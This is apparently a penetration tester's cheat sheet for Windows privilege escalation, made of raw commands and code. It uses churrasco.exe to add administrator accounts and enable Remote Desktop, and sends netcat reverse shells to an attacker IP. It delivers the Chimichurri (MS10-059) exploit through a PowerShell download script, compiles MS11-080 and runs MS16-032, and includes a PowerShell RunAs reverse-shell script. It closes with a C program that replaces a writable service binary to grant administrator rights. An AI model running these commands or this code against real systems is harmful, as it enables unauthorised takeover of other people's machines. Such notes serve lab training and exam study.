    > churrasco.exe -d "net localgroup administrators <username> /add"
    > churrasco.exe -d "net localgroup \"Remote Desktop Users\" <username> /add"
    > churrasco.exe -d "cmd /c net user oscp oscp /add && net localgroup Administrators oscp /add"
    > churrasco.exe -d "reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
    linux> rdesktop -u oscp -p oscp 10.x.x.x
    
    > churrasco.exe -d venomshell.exe
    > churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
    > \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd "windows-kernel-exploits/MS10-059: Chimichurri/Compiled"
cp Chimichurri.exe /tmp          ..for the smb share option below
python2 -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chim

ichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
..($MyIP is a placeholder: put the Kali IP in the URL)

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
nc -nvlp 5555                          ..start this on kali first
Chimichurri.exe 10.10.14.xx 5555       ..args: kali IP, port
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

Python to Exe

  • Windows privilege escalation exploits are often written in Python

  • You can compile them into a standalone executable with PyInstaller (it builds for the OS it runs on, so run it on Windows or under wine; old Python 2 exploits need a Python 2 PyInstaller, 3.6 or earlier)

> pip install pyinstaller
> wget -O exploit.py https://www.exploit-db.com/download/31853
> pyinstaller --onefile exploit.py
dist\exploit.exe

----------------------------------------
Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
https://www.exploit-db.com/exploits/6705/


----------------------------------------
> wget -O ms11-080.py https://www.exploit-db.com/download/18176
> pyinstaller --onefile ms11-080.py
dist\ms11-080.exe

Powershell Exploits

  • Some Windows privilege escalation exploits are written in PowerShell, and you may not have an interactive shell that lets you enter the PowerShell prompt. Once the script is uploaded to the target:

  • One-liner to run a PowerShell function from a basic (cmd.exe) shell: dot-source the script, then call the function

MS16-032 
https://www.exploit-db.com/exploits/39719/

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

Powershell RunAs

  • PowerShell can also be used to launch a process as another user.

  • This simple script runs a reverse shell as the specified username and password (save it as C:\Users\Public\PowerShellRunAs.ps1):

$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","10.x.x.x","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public


> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"

useradd.exe

root@kali:~# cat useradd.c

/* Drop-in replacement for a writable service binary: when the service
   starts (as SYSTEM) it adds the existing user 'bob' to Administrators. */
#include <stdlib.h> /* system */

int main(void)
{
    /* net.exe is on PATH; runs with the service account's privileges */
    system("net localgroup administrators bob /add");
    return 0;
}

Compile (cross-compile on Kali; name it after the service binary you are replacing):
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
